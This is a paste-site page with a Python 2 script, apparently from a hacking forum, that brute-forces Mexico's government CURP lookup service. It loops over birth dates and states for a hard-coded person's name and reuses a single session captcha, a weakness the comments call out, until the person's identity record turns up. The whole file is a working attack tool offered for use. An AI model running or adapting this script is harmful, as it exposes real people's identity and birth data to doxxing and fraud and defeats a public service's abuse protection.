de Commodious Pig, 1 año han pasado desde su publicación, escrito en Python.
Este código es una respuesta a curp_force.py de Foros Hackerss
- ver diferencias
Insertar vínculo
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3.  
  4. import sys
  5. import urllib2
  6. from BeautifulSoup import BeautifulSoup
  7.  
  8. # Visto en http://foros.hackerss.com/web/brute-force-a-consultas-curp-gob-mx
  9. # Coded by m4s73r <ms7rbeta@gmail.com> <root404.com>
  10. # CURP FORCE - Brute force attack to http://consultas.curp.gob.mx/
  11.  
  12. class CurpForce:
  13.  
  14.   def __init__(self):
  15.     self.URL = "http://consultas.curp.gob.mx/CurpSP/curp11.do"
  16.     self.JSESSIONID, self.BIGipServerApp = "", ""
  17.     # The name must not take accents (although this has them)
  18.     # Spaces in the name must be replaced by '+'
  19.     self.fLastName, self.sLastName, self.name, self.sex = "BAEZ", "MONTEJO", "BELEN", "M"
  20.     self.dia = range(1,32)
  21.     self.mes = range(1,13)
  22.     self.anio = range(2000,2010)
  23.     #self.anio = [2000]
  24.         #"AS">AGUASCALIENTES
  25.         #"BC">BAJA CALIFORNIA
  26.         #"BS">BAJA CALIFORNIA SUR
  27.         #"CC">CAMPECHE
  28.         #"CL">COAHUILA DE ZARAGOZA
  29.         #"CM">COLIMA
  30.         #"CS">CHIAPAS
  31.         #"CH">CHIHUAHUA
  32.         #"DF">DISTRITO FEDERAL
  33.         #"DG">DURANGO
  34.         #"GT">GUANAJUATO
  35.         #"GR">GUERRERO
  36.         #"HG">HIDALGO
  37.         #"JC">JALISCO
  38.         #"MC">MEXICO
  39.         #"MN">MICHOACAN DE OCAMPO
  40.         #"MS">MORELOS
  41.         #"NT">NAYARIT
  42.         #"NL">NUEVO LEON
  43.         #"OC">OAXACA
  44.         #"PL">PUEBLA
  45.         #"QT">QUERETARO DE ARTEAGA
  46.         #"QR">QUINTANA ROO
  47.         #"SP">SAN LUIS POTOSI
  48.         #"SL">SINALOA
  49.         #"SR">SONORA
  50.         #"TC">TABASCO
  51.         #"TS">TAMAULIPAS
  52.         #"TL">TLAXCALA
  53.         #"VZ">VERACRUZ
  54.         #"YN">YUCATAN
  55.         #"ZS">ZACATECAS
  56.         #"NE">NACIDO EN EL EXTRANJERO
  57.     #self.city = ["AS","BC","BS","CC","CL","CM","CS","CH","DF","DG","GT","GR","HG","JC","MC","MN","MS","NT","NL","OC","PL","QT","QR","SP","SL","SR","TC","TS","TL","VZ","YN","ZS","NE"]
  58.     self.city = ["MC","DF"]
  59.     self._type, self.captcha = "A", ""
  60.  
  61.    
  62.   def start(self):
  63.     opener = urllib2.build_opener()
  64.     opener.addheaders.append(('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'))
  65.     opener.addheaders.append(('Accept-Encoding', 'gzip,deflate,sdch'))
  66.     opener.addheaders.append(('Accept-Language', 'es-419,es;q=0.8,en;q=0.6,gl;q=0.4'))
  67.     opener.addheaders.append(('Cookie', 'JSESSIONID=' + self.JSESSIONID + '; BIGipServerApp_Consultas_CURP_en_portales_CURP_SP=' + self.BIGipServerApp))
  68.     opener.addheaders.append(('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36'))
  69.  
  70.     url = self.URL
  71.     #url += "jsessionid=" + self.JSESSIONID
  72.     url += "?strBAEZ=" + self.fLastName
  73.     url += "&strMONTEJO=" + self.sLastName
  74.     url += "&strBELEN=" + self.name
  75.  
  76.     found = False
  77.    
  78.     for e in self.city:
  79.       if found:
  80.         break
  81.       eurl = url + "&sEntidadA=TC" + e
  82.       for a in self.anio:
  83.         if found:
  84.           break
  85.         aurl = eurl + "&stranio=" + str(a)
  86.         for m in self.mes:
  87.           if found:
  88.             break
  89.           murl = aurl + "&strmes=" + str(m).zfill(2)
  90.           for d in self.dia:
  91.             if found:
  92.               break
  93.             durl = murl + "&strdia=" + str(d).zfill(2)
  94.  
  95.             print "[SEARCH]: %s %s %s [CITY:%s,YEAR:%s,MONTH:%s,DAY:%s]" %(self.fLastName, self.sLastName, self.name, e, a, m, d)
  96.            
  97.             final = durl + "&sSexoA=" + self.sex + "&strTipo=A&codigo=" + self.captcha
  98.             f = opener.open(final).read()
  99.            
  100.             if "No se encuentra" in f or "no es V" in f or "Ocurrio un error" in f:
  101.               print " [NOT-FOUND]"
  102.             else:
  103.               found = True
  104.               print "\n [!!][FOUND] : URL[%s]" %(final)
  105.  
  106.    
  107.   def main(self):
  108.     #set cookies
  109.     #Go to http://consultas.curp.gob.mx/ and a cookie management tool for obtaining the value of the cookies requested
  110.     self.JSESSIONID = raw_input("\n [JSESSIONID] = ")
  111.     self.BIGipServerApp = raw_input(" [BIGipServerApp] = ")
  112.     #get captcha
  113.     #captcha remains the same for the entire session
  114.     #here vulnerability
  115.     self.captcha = raw_input(" [CAPTCHA] = ")
  116.    
  117.     while 1:
  118.       cmd = raw_input("\n [>>] ");
  119.  
  120.       if cmd == "start":
  121.         self.start()
  122.       elif cmd == "exit":
  123.         sys.exit()
  124.  
  125. CF = CurpForce()
  126.  
  127. if __name__ == "__main__":
  128.     CF.main()
  129.